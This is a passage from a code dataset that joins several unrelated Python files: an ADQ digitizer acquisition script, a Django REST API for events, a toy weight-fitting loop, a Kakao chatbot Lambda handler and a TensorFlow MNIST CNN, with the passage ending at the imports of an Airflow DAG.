Linux\n#ADQAPI = ct.cdll.LoadLibrary(\"libadq.so\")\n# For Python under Windows\nADQAPI = ct.cdll.LoadLibrary(\"ADQAPI.dll\")\nADQAPI.ADQAPI_GetRevision()\n\n# Manually set return type from some ADQAPI functions\nADQAPI.CreateADQControlUnit.restype = ct.c_void_p\nADQAPI.ADQ_GetRevision.restype = ct.c_void_p\nADQAPI.ADQ_GetPtrStream.restype = ct.POINTER(ct.c_int16)\nADQAPI.ADQControlUnit_FindDevices.argtypes = [ct.c_void_p]\n\n# Create ADQControlUnit\nadq_cu = ct.c_void_p(ADQAPI.CreateADQControlUnit())\nADQAPI.ADQControlUnit_EnableErrorTrace(adq_cu, 3, '.')\nadq_num = 1\n\n# Convenience 
function\ndef adq_status(status):\n if (status==0):\n return 'FAILURE'\n else:\n return 'OK' \n\n# Find ADQ devices\nADQAPI.ADQControlUnit_FindDevices(adq_cu)\nn_of_ADQ = ADQAPI.ADQControlUnit_NofADQ(adq_cu)\nprint('Number of ADQ found: {}'.format(n_of_ADQ))\n\nif n_of_ADQ < 2:\n print('Failed to find two devices, aborting ...')\nelse:\n for adq_num in range(1, n_of_ADQ+1):\n # Get revision info from ADQ\n rev = ADQAPI.ADQ_GetRevision(adq_cu, adq_num)\n revision = ct.cast(rev, ct.POINTER(ct.c_int))\n print('Connected to ADQ {}'.format(adq_num))\n # Print revision information\n print('FPGA Revision: {}'.format(revision[0]))\n if (revision[1]):\n print('Local copy')\n else:\n print('SVN Managed')\n if (revision[2]):\n print('Mixed Revision')\n else:\n print('SVN Updated')\n print('')\n\n # Set clock source\n ADQ_CLOCK_INT_INTREF = 0\n ADQ_CLOCK_INT_EXTREF = 1\n ADQ_CLOCK_EXT = 2\n ADQ_CLOCK_INT_PXIREF = 3\n clock_source = ADQ_CLOCK_INT_EXTREF # Choose an external 10Mhz clock as the common reference\n success = ADQAPI.ADQ_SetClockSource(adq_cu, adq_num, clock_source)\n if (success == 0):\n print('ADQ_SetClockSource failed.')\n\n # Set trig mode\n SW_TRIG = 1\n EXT_TRIG = 2\n LVL_TRIG = 3\n INT_TRIG = 4\n EXT_SYNC = 9\n trigger = EXT_TRIG # Set as external trig\n success = ADQAPI.ADQ_SetTriggerMode(adq_cu, adq_num, trigger)\n if (success == 0):\n print('ADQ_SetTriggerMode failed.')\n\n # Reset timestamp counter\n SYN_ONCE = 0 # Synchronize only on the first trigger event\n SYN_EACH_TRIG = 1 # synchronize on all trigger events (until disarmed)\n syn_mode = SYN_ONCE\n trig_source = EXT_TRIG # TRIG connector as the source for timestamp counter reset\n success = ADQAPI.ADQ_DisarmTimestampSync(adq_cu, adq_num)\n success = ADQAPI.ADQ_SetupTimestampSync(adq_cu, adq_num, syn_mode, trig_source)\n success = ADQAPI.ADQ_ArmTimestampSync(adq_cu, adq_num)\n if (success == 0):\n print('ADQ_SetupTimestampSync failed.')\n\n # Reduce sampling rate\n # decimation_factor = 4\n # success = ADQAPI.ADQ_SetSampleSkip(adq_cu, adq_num, decimation_factor)\n\n number_of_records = 1\n samples_per_record = 1 * 10 ** 6\n\n ADQAPI.ADQ_MultiRecordSetup(adq_cu, adq_num,number_of_records,samples_per_record)\n\n sleep_time = 5\n print('Waiting {} seconds for external trigger to reset the timestamp counter'.format(sleep_time))\n time.sleep(sleep_time)\n\n num_snapshot = 31\n for snapshot in range(1,num_snapshot+1):\n print('\\nStarting collection with Snapshot {}'.format(snapshot))\n\n # Enable trigger\n for adq_num in range(1,n_of_ADQ+1):\n ADQAPI.ADQ_DisarmTrigger(adq_cu, adq_num)\n ADQAPI.ADQ_ArmTrigger(adq_cu, adq_num)\n\n # Data acquisition and transfer\n for adq_num in range(1, n_of_ADQ + 1):\n while (ADQAPI.ADQ_GetAcquiredAll(adq_cu, adq_num) == 0):\n if (trigger == SW_TRIG):\n ADQAPI.ADQ_SWTrig(adq_cu, adq_num)\n # print('Waiting for trigger')\n\n # Setup target buffers for data\n max_number_of_channels = ADQAPI.ADQ_GetNofChannels(adq_cu, adq_num)\n print('Number of channels: {}'.format(max_number_of_channels))\n target_buffers = (ct.POINTER(ct.c_int16 * samples_per_record * number_of_records) * max_number_of_channels)()\n for bufp in target_buffers:\n bufp.contents = (ct.c_int16 * samples_per_record * number_of_records)()\n target_timestamps = (ct.POINTER(ct.c_ulonglong * number_of_records))()\n target_timestamps.contents = (ct.c_ulonglong * number_of_records)()\n\n # Get data from ADQ\n ADQ_TRANSFER_MODE_NORMAL = 0\n ADQ_CHANNELS_MASK = 0xFF\n status = ADQAPI.ADQ_GetDataWHTS(adq_cu, adq_num, target_buffers, 0, 
target_timestamps,\n samples_per_record * number_of_records , 2,\n 0, number_of_records, ADQ_CHANNELS_MASK,\n 0, samples_per_record, ADQ_TRANSFER_MODE_NORMAL)\n print('ADQ_GetData returned {}'.format(adq_status(status)))\n\n # Re-arrange data in numpy arrays\n data_16bit_ch0 = np.frombuffer(target_buffers[0].contents[0], dtype=np.int16)\n data_16bit_ch1 = np.frombuffer(target_buffers[1].contents[0], dtype=np.int16)\n tstamp_64bit_rec0 = np.frombuffer(target_timestamps.contents, dtype=np.ulonglong)\n print('ADQ {} Timestamp is {}' .format(adq_num, tstamp_64bit_rec0[0]))\n\n # Plot data\n # if True:\n # plt.figure(0)\n # plt.clf()\n # plt.plot(data_16bit_ch0[:500], '.-')\n # # plt.plot(data_16bit_ch1[:1000], '.--')\n #\n # plt.figure(1)\n # plt.clf()\n # plt.plot(data_16bit_ch0[-500:], '.-')\n # # plt.plot(data_16bit_ch1[-1000:],'.--')\n #\n # plt.show()\n\n # Only disarm trigger after all data snapshots are collected\n ADQAPI.ADQ_DisarmTrigger(adq_cu, adq_num)\n ADQAPI.ADQ_MultiRecordClose(adq_cu, adq_num)\n\n # Delete ADQControlunit\n ADQAPI.DeleteADQControlUnit(adq_cu)\n\n print('Done')\n\n\n# This can be used to completely unload the DLL in Windows\n#ct.windll.kernel32.FreeLibrary(ADQAPI._handle)\n","sub_path":"ADQ-PYTHON/ADQ_multirecord_sync_timestamp.py","file_name":"ADQ_multirecord_sync_timestamp.py","file_ext":"py","file_size_in_byte":6388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"61399171","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom functools import wraps\nfrom datetime import datetime, timedelta\nfrom pprint import pprint\n\nfrom django.utils import translation\nfrom django.contrib.gis.geos import Point\nfrom django.core.exceptions import ValidationError\nfrom django.core.urlresolvers import NoReverseMatch\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom django.contrib.gis.db.models.fields import GeometryField\nfrom django.db import models as django_db_models\nfrom django.db.models import Q, F\nfrom isodate import Duration, duration_isoformat, parse_duration\nfrom rest_framework import serializers, pagination, relations, viewsets, filters, generics, fields\nfrom rest_framework.reverse import reverse\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import ParseError\nfrom events.models import Place, Event, Keyword, Language, OpeningHoursSpecification, EventLink\nfrom django.conf import settings\nfrom events import utils\nfrom events.custom_elasticsearch_search_backend import CustomEsSearchQuerySet as SearchQuerySet\nfrom modeltranslation.translator import translator, NotRegistered\nfrom django.utils.translation import ugettext_lazy as _\nfrom dateutil.parser import parse as dateutil_parse\nfrom haystack.query import AutoQuery\n\nfrom munigeo.api import GeoModelSerializer, GeoModelAPIView, build_bbox_filter, srid_to_srs\n\nimport pytz\n\n\nserializers_by_model = {}\n\nall_views = []\ndef register_view(klass, name, base_name=None):\n entry = {'class': klass, 'name': name}\n if base_name is not None:\n entry['base_name'] = base_name\n all_views.append(entry)\n\n if klass.serializer_class and hasattr(klass.serializer_class.Meta, 'model'):\n model = klass.serializer_class.Meta.model\n serializers_by_model[model] = klass.serializer_class\n\n\nclass CustomPaginationSerializer(pagination.PaginationSerializer):\n results_field = 'data'\n def to_native(self, obj):\n ret = super(CustomPaginationSerializer, self).to_native(obj)\n meta_fields = 
['count', 'next', 'previous']\n meta = {}\n for f in meta_fields:\n meta[f] = ret[f]\n del ret[f]\n ret['meta'] = meta\n if False: # FIXME: Check for JSON-LD\n try:\n ret['@context'] = obj.object_list.model.jsonld_context\n except (NameError, AttributeError):\n ret['@context'] = 'http://schema.org'\n pass\n return ret\n\n\nclass JSONLDRelatedField(relations.HyperlinkedRelatedField):\n \"\"\"\n Support of showing and saving of expanded JSON nesting or just a resource\n URL.\n Serializing is controlled by query string param 'expand', deserialization\n by format of JSON given.\n\n Default serializing is expand=true.\n \"\"\"\n\n invalid_json_error = _('Incorrect JSON. Expected JSON, received %s.')\n\n def __init__(self, *args, **kwargs):\n self.related_serializer = kwargs.pop('serializer', None)\n self.hide_ld_context = kwargs.pop('hide_ld_context', False)\n super(JSONLDRelatedField, self).__init__(*args, **kwargs)\n\n def to_native(self, obj):\n if self.is_expanded():\n return self.related_serializer(obj, hide_ld_context=self.hide_ld_context,\n context=self.context).data\n link = super(JSONLDRelatedField, self).to_native(obj)\n return {\n '@id': link\n }\n\n def from_native(self, value):\n if '@id' in value:\n return super(JSONLDRelatedField, self).from_native(value['@id'])\n else:\n raise ValidationError(\n self.invalid_json_error % type(value).__name__)\n\n def is_expanded(self):\n return getattr(self, 'expanded', False)\n\n\nclass EnumChoiceField(serializers.WritableField):\n \"\"\"\n Database value of tinyint is converted to and from a string representation\n of choice field.\n\n TODO: Find if there's standardized way to render Schema.org enumeration\n instances in JSON-LD.\n \"\"\"\n\n def __init__(self, choices, prefix=''):\n self.choices = choices\n self.prefix = prefix\n super(EnumChoiceField, self).__init__()\n\n def to_native(self, obj):\n if obj is None:\n return None\n return self.prefix + utils.get_value_from_tuple_list(self.choices,\n obj, 1)\n\n def from_native(self, data):\n return utils.get_value_from_tuple_list(self.choices,\n self.prefix + data, 0)\n\n\nclass ISO8601DurationField(serializers.WritableField):\n def to_native(self, obj):\n if obj:\n d = Duration(milliseconds=obj)\n return duration_isoformat(d)\n else:\n return None\n\n def from_native(self, data):\n if data:\n value = parse_duration(data)\n # the stored value is in milliseconds (see to_native), so the days term\n # must also convert to milliseconds; the original factor of 1000000 was off by 1000\n return (\n value.days * 24 * 3600 * 1000\n + value.seconds * 1000\n + value.microseconds / 1000\n )\n else:\n return 0\n\n\nclass MPTTModelSerializer(serializers.ModelSerializer):\n def __init__(self, *args, **kwargs):\n super(MPTTModelSerializer, self).__init__(*args, **kwargs)\n for field_name in 'lft', 'rght', 'tree_id', 'level':\n if field_name in self.fields:\n del self.fields[field_name]\n\n\nclass TranslatedModelSerializer(serializers.ModelSerializer):\n def __init__(self, *args, **kwargs):\n super(TranslatedModelSerializer, self).__init__(*args, **kwargs)\n model = self.opts.model\n try:\n trans_opts = translator.get_options_for_model(model)\n except NotRegistered:\n self.translated_fields = []\n return\n\n self.translated_fields = trans_opts.fields.keys()\n lang_codes = [x[0] for x in settings.LANGUAGES]\n # Remove the pre-existing data in the bundle.\n for field_name in self.translated_fields:\n for lang in lang_codes:\n key = \"%s_%s\" % (field_name, lang)\n if key in self.fields:\n del self.fields[key]\n del self.fields[field_name]\n\n def get_field(self, model_field):\n kwargs = {}\n if issubclass(\n model_field.__class__,\n (django_db_models.CharField,\n 
django_db_models.TextField)):\n if model_field.null:\n kwargs['allow_none'] = True\n kwargs['max_length'] = getattr(model_field, 'max_length')\n return fields.CharField(**kwargs)\n return super(TranslatedModelSerializer, self).get_field(model_field)\n\n def to_native(self, obj):\n ret = super(TranslatedModelSerializer, self).to_native(obj)\n if obj is None:\n return ret\n return self.translated_fields_to_native(obj, ret)\n\n def translated_fields_to_native(self, obj, ret):\n for field_name in self.translated_fields:\n d = {}\n default_lang = settings.LANGUAGES[0][0]\n d[default_lang] = getattr(obj, field_name)\n for lang in [x[0] for x in settings.LANGUAGES[1:]]:\n key = \"%s_%s\" % (field_name, lang)\n val = getattr(obj, key, None)\n if val is None:\n continue\n d[lang] = val\n\n # If no text provided, leave the field as null\n for key, val in d.items():\n if val is not None:\n break\n else:\n d = None\n ret[field_name] = d\n\n return ret\n\n\nclass LinkedEventsSerializer(TranslatedModelSerializer, MPTTModelSerializer):\n \"\"\"Serializer with the support for JSON-LD/Schema.org.\n\n JSON-LD/Schema.org syntax::\n\n {\n \"@context\": \"http://schema.org\",\n \"@type\": \"Event\",\n \"name\": \"Event name\",\n ...\n }\n\n See full example at: http://schema.org/Event\n\n Args:\n hide_ld_context (bool):\n Hides `@context` from JSON, can be used in nested\n serializers\n \"\"\"\n\n def __init__(self, instance=None, data=None, files=None,\n context=None, partial=False, many=None,\n allow_add_remove=False, hide_ld_context=False, **kwargs):\n super(LinkedEventsSerializer, self).__init__(instance, data, files,\n context, partial, many,\n allow_add_remove,\n **kwargs)\n if 'created_by' in self.fields:\n del self.fields['created_by']\n if 'modified_by' in self.fields:\n del self.fields['modified_by']\n\n if context is not None:\n include_fields = context.get('include', [])\n for field_name in include_fields:\n if field_name not in self.fields:\n continue\n field = self.fields[field_name]\n if not isinstance(field, JSONLDRelatedField):\n continue\n field.expanded = True\n\n self.hide_ld_context = hide_ld_context\n\n self.disable_camelcase = True\n if 'request' in self.context:\n request = self.context['request']\n if 'disable_camelcase' in request.QUERY_PARAMS:\n self.disable_camelcase = True\n\n def to_native(self, obj):\n \"\"\"\n Before sending to renderer there's a need to do additional work on\n to-be-JSON dictionary data:\n 1. Add @context, @type and @id fields\n 2. Convert field names to camelCase\n Renderer is the right place for this but now loop is done just once.\n Reversal conversion is done in parser.\n \"\"\"\n ret = super(LinkedEventsSerializer, self).to_native(obj)\n if 'id' in ret and 'request' in self.context:\n try:\n ret['@id'] = reverse(self.view_name,\n kwargs={u'pk': ret['id']},\n request=self.context['request'])\n except NoReverseMatch:\n ret['@id'] = str(ret['id']) # fall back to the plain id; 'value' was an undefined name here\n\n # Context is hidden if:\n # 1) hide_ld_context is set to True\n # 2) self.object is None, e.g. 
we are in the list of stuff\n if not self.hide_ld_context and self.object is not None:\n if hasattr(obj, 'jsonld_context') \\\n and isinstance(obj.jsonld_context, (dict, list)):\n ret['@context'] = obj.jsonld_context\n else:\n ret['@context'] = 'http://schema.org'\n\n # Use jsonld_type attribute if present,\n # if not fallback to automatic resolution by model name.\n # Note: Plan 'type' could be aliased to @type in context definition to\n # conform JSON-LD spec.\n if hasattr(obj, 'jsonld_type'):\n ret['@type'] = obj.jsonld_type\n else:\n ret['@type'] = obj.__class__.__name__\n\n return ret\n\n\nclass KeywordSerializer(LinkedEventsSerializer):\n view_name = 'keyword-detail'\n\n class Meta:\n model = Keyword\n\nclass KeywordViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = Keyword.objects.all()\n serializer_class = KeywordSerializer\n\nregister_view(KeywordViewSet, 'keyword')\n\n\nclass PlaceSerializer(LinkedEventsSerializer, GeoModelSerializer):\n view_name = 'place-detail'\n\n class Meta:\n model = Place\n\n\nclass PlaceViewSet(GeoModelAPIView, viewsets.ReadOnlyModelViewSet):\n queryset = Place.objects.all()\n serializer_class = PlaceSerializer\n pagination_serializer_class = CustomPaginationSerializer\n\n\nregister_view(PlaceViewSet, 'place')\n\n\nclass OpeningHoursSpecificationSerializer(LinkedEventsSerializer):\n class Meta:\n model = OpeningHoursSpecification\n\n\nclass LanguageSerializer(LinkedEventsSerializer):\n view_name = 'language-detail'\n\n class Meta:\n model = Language\n\n\nclass LanguageViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = Language.objects.all()\n serializer_class = LanguageSerializer\n\nregister_view(LanguageViewSet, 'language')\n\nLOCAL_TZ = pytz.timezone(settings.TIME_ZONE)\n\nclass EventLinkSerializer(serializers.ModelSerializer):\n def to_native(self, obj):\n ret = super(EventLinkSerializer, self).to_native(obj)\n if not ret['name']:\n ret['name'] = None\n return ret\n\n class Meta:\n model = EventLink\n exclude = ['id']\n\nclass EventSerializer(LinkedEventsSerializer, GeoModelAPIView):\n location = JSONLDRelatedField(serializer=PlaceSerializer, required=False,\n view_name='place-detail')\n # provider = OrganizationSerializer(hide_ld_context=True)\n keywords = JSONLDRelatedField(serializer=KeywordSerializer, many=True, required=False,\n view_name='keyword-detail')\n super_event = JSONLDRelatedField(required=False, view_name='event-detail')\n event_status = EnumChoiceField(Event.STATUSES)\n external_links = EventLinkSerializer(many=True)\n\n view_name = 'event-detail'\n\n def to_native(self, obj):\n ret = super(EventSerializer, self).to_native(obj)\n if 'start_time' in ret and not obj.has_start_time:\n # Return only the date part\n ret['start_time'] = obj.start_time.astimezone(LOCAL_TZ).strftime('%Y-%m-%d')\n if 'end_time' in ret and not obj.has_end_time:\n # If we're storing only the date part, do not pretend we have the exact time.\n if obj.end_time - obj.start_time <= timedelta(days=1):\n ret['end_time'] = None\n if hasattr(obj, 'days_left'):\n ret['days_left'] = int(obj.days_left)\n\n return ret\n\n class Meta:\n model = Event\n exclude = ['has_start_time', 'has_end_time']\n\n\ndef parse_time(time_str, is_start):\n time_str = time_str.strip()\n # Handle dates first. 
Assume dates are given in local timezone.\n # FIXME: What if there's no local timezone?\n try:\n dt = datetime.strptime(time_str, '%Y-%m-%d')\n dt = dt.replace(tzinfo=LOCAL_TZ)\n except ValueError:\n dt = None\n if not dt:\n if time_str.lower() == 'today':\n dt = datetime.utcnow().replace(tzinfo=pytz.utc)\n dt = dt.astimezone(LOCAL_TZ)\n dt = dt.replace(hour=0, minute=0, second=0, microsecond=0)\n if dt:\n # With start timestamps, we treat dates as beginning\n # at midnight the same day. End timestamps are taken to\n # mean midnight on the following day.\n if not is_start:\n dt = dt + timedelta(days=1)\n else:\n try:\n # Handle all other times through dateutil.\n dt = dateutil_parse(time_str)\n except TypeError:\n raise ParseError('time in invalid format (try ISO 8601 or yyyy-mm-dd)')\n return dt\n\n\nclass JSONAPIViewSet(viewsets.ReadOnlyModelViewSet):\n def initial(self, request, *args, **kwargs):\n ret = super(JSONAPIViewSet, self).initial(request, *args, **kwargs)\n self.srs = srid_to_srs(self.request.QUERY_PARAMS.get('srid', None))\n return ret\n\n def get_serializer_context(self):\n context = super(JSONAPIViewSet, self).get_serializer_context()\n\n include = self.request.QUERY_PARAMS.get('include', '')\n context['include'] = [x.strip() for x in include.split(',') if x]\n context['srs'] = self.srs\n\n return context\n\nclass LinkedEventsOrderingFilter(filters.OrderingFilter):\n ordering_param = 'sort'\n\nclass EventOrderingFilter(LinkedEventsOrderingFilter):\n def filter_queryset(self, request, queryset, view):\n queryset = super(EventOrderingFilter, self).filter_queryset(request, queryset, view)\n ordering = self.get_ordering(request)\n if not ordering:\n ordering = []\n if 'days_left' in [x.lstrip('-') for x in ordering]:\n queryset = queryset.extra(select={'days_left': 'date_part(\\'day\\', end_time - start_time)'})\n return queryset\n\nclass EventViewSet(JSONAPIViewSet):\n \"\"\"\n # Filtering retrieved events\n\n Query parameters can be used to filter the retrieved events by\n the following criteria.\n\n ## Event time\n\n Use `start` and `end` to restrict the date range of returned events.\n Any events that intersect with the given date range will be returned.\n\n The parameters `start` and `end` can be given in the following formats:\n\n - ISO 8601 (including the time of day)\n - yyyy-mm-dd\n\n In addition, `today` can be used as the value.\n\n Example:\n\n event/?start=2014-01-15&end=2014-01-20\n\n [See the result](?start=2014-01-15&end=2014-01-20 \"json\")\n\n ## Event location\n\n ### Bounding box\n\n To restrict the retrieved events to a geographical region, use\n the query parameter `bbox` in the format\n\n bbox=west,south,east,north\n\n Where `west` is the longitude of the rectangle's western boundary,\n `south` is the latitude of the rectangle's southern boundary,\n and so on.\n\n Example:\n\n event/?bbox=24.9348,60.1762,24.9681,60.1889\n\n [See the result](?bbox=24.9348,60.1762,24.9681,60.1889 \"json\")\n\n # Getting detailed data\n\n In the default case, keywords, locations, and other fields that\n refer to separate resources are only displayed as simple references.\n\n If you want to include the complete data from related resources in\n the current response, use the keyword `include`. 
For example:\n\n event/?include=location,keywords\n\n [See the result](?include=location,keywords \"json\")\n\n # Response data for the current URL\n\n \"\"\"\n queryset = Event.objects.all()\n serializer_class = EventSerializer\n pagination_serializer_class = CustomPaginationSerializer\n filter_backends = (EventOrderingFilter,)\n ordering_fields = ('start_time', 'end_time', 'days_left')\n\n def filter_queryset(self, queryset):\n \"\"\"\n TODO: convert to use proper filter framework\n \"\"\"\n\n queryset = super(EventViewSet, self).filter_queryset(queryset)\n\n if 'show_all' not in self.request.QUERY_PARAMS:\n queryset = queryset.filter(Q(event_status=Event.SCHEDULED))\n\n val = self.request.QUERY_PARAMS.get('start', None)\n if val:\n dt = parse_time(val, is_start=True)\n queryset = queryset.filter(Q(end_time__gt=dt) | Q(start_time__gte=dt))\n val = self.request.QUERY_PARAMS.get('end', None)\n if val:\n dt = parse_time(val, is_start=False)\n queryset = queryset.filter(Q(end_time__lt=dt) | Q(start_time__lte=dt))\n\n val = self.request.QUERY_PARAMS.get('bbox', None)\n if val:\n bbox_filter = build_bbox_filter(self.srs, val, 'position')\n places = Place.geo_objects.filter(**bbox_filter)\n queryset = queryset.filter(location__in=places)\n\n val = self.request.QUERY_PARAMS.get('data_source', None)\n if val:\n queryset = queryset.filter(data_source=val)\n\n val = self.request.QUERY_PARAMS.get('location', None)\n if val:\n queryset = queryset.filter(location_id=val)\n\n val = self.request.QUERY_PARAMS.get('keyword', None)\n if val:\n queryset = queryset.filter(keywords__pk=val)\n\n return queryset\n\nregister_view(EventViewSet, 'event')\n\n\nclass SearchSerializer(serializers.Serializer):\n def to_native(self, search_result):\n model = search_result.model\n assert model in serializers_by_model, \"Serializer for %s not found\" % model\n ser_class = serializers_by_model[model]\n data = ser_class(search_result.object, context=self.context).data\n data['object_type'] = model._meta.model_name\n data['score'] = search_result.score\n return data\n\nDATE_DECAY_SCALE = '30d'\n\nclass SearchViewSet(GeoModelAPIView, viewsets.ViewSetMixin, generics.ListAPIView):\n serializer_class = SearchSerializer\n\n def list(self, request, *args, **kwargs):\n languages = [x[0] for x in settings.LANGUAGES]\n\n # If the incoming language is not specified, go with the default.\n self.lang_code = request.QUERY_PARAMS.get('language', languages[0])\n if self.lang_code not in languages:\n raise ParseError(\"Invalid language supplied. 
Supported languages: %s\" %\n ','.join(languages))\n\n input_val = request.QUERY_PARAMS.get('input', '').strip()\n q_val = request.QUERY_PARAMS.get('q', '').strip()\n if not input_val and not q_val:\n raise ParseError(\"Supply search terms with 'q=' or autocomplete entry with 'input='\")\n if input_val and q_val:\n raise ParseError(\"Supply either 'q' or 'input', not both\")\n\n old_language = translation.get_language()[:2]\n translation.activate(self.lang_code)\n\n queryset = SearchQuerySet()\n if input_val:\n queryset = queryset.filter(autosuggest=input_val)\n now = datetime.utcnow()\n queryset = queryset.filter(end_time__gt=now).decay({\n 'gauss': {\n 'end_time': {\n 'origin': now,\n 'scale': DATE_DECAY_SCALE }}})\n else:\n queryset = queryset.filter(text=AutoQuery(q_val))\n\n self.object_list = queryset.load_all()\n\n # Switch between paginated or standard style responses\n page = self.paginate_queryset(self.object_list)\n if page is not None:\n serializer = self.get_pagination_serializer(page)\n else:\n serializer = self.get_serializer(self.object_list, many=True)\n\n resp = Response(serializer.data)\n\n translation.activate(old_language)\n\n return resp\n\n\nregister_view(SearchViewSet, 'search', base_name='search')\n","sub_path":"events/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":21896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"130285534","text":"import random\nimport math\n# use the built-in random library for random values\ninches = 40 # inches\ncentimetre = 101.6 # centimetres\n\ndef kid_neuro(epoch, lr, accur):\n \"\"\"\n epoch - how many times it will try to fit the right weight\n lr - learning rate - how big the adjustment steps are\n accur - what accuracy we consider satisfactory\n \"\"\"\n W_coef = random.uniform(1,3)\n print(f\"Наш первональный вес равен: {W_coef}\") # so we can see what the random init produced\n for i in range(epoch): # loop over the epochs\n Error = centimetre - (inches * W_coef)\n # e (the error) is another key ingredient of a neural network\n print(f\"Наша ошибка составляет {Error}\") # print the error to visualize progress\n\n if abs(Error) < accur:\n print(f\"Наш итогвый результат {W_coef}\")\n break # stop once the weight is accurate enough; the original kept looping here\n # only the absolute value of the error matters\n if Error > 0:\n W_coef += lr\n # if the error is positive, we need to increase the weight\n elif Error < 0:\n W_coef -= lr\n # if the error is negative, we need to decrease the weight\n \n\n","sub_path":"16 Применяем навыки на практике, создание собственного проекта/code/kid_neuro/kinder.py","file_name":"kinder.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"69348668","text":"import json\r\nimport lambda_prototype_module as Module\r\nimport base64\r\n\r\ndef lambda_handler(event, context):\r\n return_string = None\r\n try:\r\n request_body = event['body']\r\n request_body = json.loads(base64.b64decode(request_body))\r\n param = request_body['action']['params']\r\n key = list(param.keys()) # the incoming values are handled here\r\n # if several arrive, the required parameter name ends up in key[0]\r\n if key[0] == 'weather': # weather related\r\n return_string = Module.CrawlingFunction.weather(Module.CrawlingFunction, param[key[0]])\r\n\r\n elif key[0] == 'feedback_upload':\r\n return_string = Module.s3IOEvent.upload_feedback(Module.CrawlingFunction, params=str(param[key[0]]))\r\n elif key[0] == 'read_feedback':\r\n return_string = 
Module.s3IOEvent.read_feedback(Module.CrawlingFunction, params=str(param[key[0]]))\r\n elif key[0] == 'perm_chk':\r\n return_string = request_body['userRequest']['user']['id']\r\n else:\r\n return_string = \"산돌이가 작업을 마무리하지 못했어요ㅠㅠ\\n 피드백을 통해 어떤 기능에서 오류가 발생했는지 알려주시면 빠른 시일 내에 작동 하도록 할게요\"\r\n\r\n result = {\r\n \"version\": \"2.0\",\r\n \"template\": {\r\n \"outputs\": [\r\n {\r\n \"simpleText\": {\r\n \"text\": str(return_string)\r\n }\r\n }\r\n ]\r\n }\r\n }\r\n\r\n except Exception as e:\r\n result = {\r\n \"version\": \"2.0\",\r\n \"template\": {\r\n \"outputs\": [\r\n {\r\n \"simpleText\": {\r\n \"text\": str(e)\r\n }\r\n }\r\n ]\r\n }\r\n }\r\n\r\n return {\r\n 'statusCode': 200,\r\n 'body': json.dumps(result),\r\n 'headers': {\r\n 'Access-Control-Allow-Origin': '*',\r\n }\r\n }\r\n\r\nif __name__ == \"__main__\":\r\n lambda_handler(\"a\", \"b\") # local smoke test only; guarded so it no longer runs when AWS imports the module","sub_path":"betaSandol/lambda_prototype.py","file_name":"lambda_prototype.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"327593019","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport numpy as np\n\nmnist=input_data.read_data_sets('MNIST_data',one_hot=True) # load the data\n\nbatch_size=100 # batch size\nbatch_n=mnist.train.num_examples//batch_size # number of batches\n\n# define two placeholders\nx=tf.placeholder(tf.float32,[None,784])\ny=tf.placeholder(tf.float32,[None,10])\n\n# parameters\nW_conv1=tf.Variable(tf.truncated_normal([3,3,1,8],0,0.1)) # conv layer I: eight 3*3*1 kernels\nb_conv1=tf.Variable(tf.constant(0.1,shape=[8]))\nW_conv2=tf.Variable(tf.truncated_normal([3,3,8,16],0,0.1)) # conv layer II: sixteen 3*3*8 kernels\nb_conv2=tf.Variable(tf.constant(0.1,shape=[16]))\nW_fc1=tf.Variable(tf.truncated_normal([7*7*16,100],0,0.1)) # fully connected layer I: 100 neurons\nb_fc1=tf.Variable(tf.constant(0.1,shape=[100]))\nW_fc2=tf.Variable(tf.truncated_normal([100,10],0,0.1)) # fully connected layer II: 10 neurons\nb_fc2=tf.Variable(tf.constant(0.1,shape=[10]))\n\nx_image=tf.reshape(x,[-1,28,28,1]) # reshape to 4-D\nh_conv1=tf.nn.relu(tf.nn.conv2d(x_image,W_conv1,[1,1,1,1],padding='SAME')+b_conv1) # convolution I\nh_pool1=tf.nn.max_pool(h_conv1,[1,2,2,1],[1,2,2,1],padding='SAME') # pooling I\nh_conv2=tf.nn.relu(tf.nn.conv2d(h_pool1,W_conv2,[1,1,1,1],padding='SAME')+b_conv2) # convolution II\nh_pool2=tf.nn.max_pool(h_conv2,[1,2,2,1],[1,2,2,1],padding='SAME') # pooling II\nh_pool2_flat=tf.reshape(h_pool2,[-1,7*7*16]) # flatten\nh_fc1=tf.nn.relu(tf.matmul(h_pool2_flat,W_fc1)+b_fc1) # fully connected I\nlogits=tf.matmul(h_fc1,W_fc2)+b_fc2 # fully connected II (raw logits)\nprediction=tf.nn.softmax(logits)\nloss=tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=logits)) # loss function; pass the raw logits, not the softmax output, to avoid a double softmax\ntrain=tf.train.AdamOptimizer(0.001).minimize(loss) # training op\naccuracy=tf.reduce_mean(tf.cast(tf.equal(tf.argmax(prediction,1),tf.argmax(y,1)),tf.float32)) # compute the accuracy\n \nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(21):\n for batch in range(batch_n):\n batch_xs,batch_ys=mnist.train.next_batch(batch_size)\n sess.run(train,feed_dict={x:batch_xs,y:batch_ys})\n print(\"Iter: \"+str(epoch)+\", acc: \"+str(sess.run(accuracy,feed_dict={x:mnist.test.images,y:mnist.test.labels})))\n","sub_path":"卷积神经网络版_V3.py","file_name":"卷积神经网络版_V3.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"477425545","text":"from datetime import timedelta\nfrom datetime import datetime\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.utils.dates import days_ago\n\nfrom 
